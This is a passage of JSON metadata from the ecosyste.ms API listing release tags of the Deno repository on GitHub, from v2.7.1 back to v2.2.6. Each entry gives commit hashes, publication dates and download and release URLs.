https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"h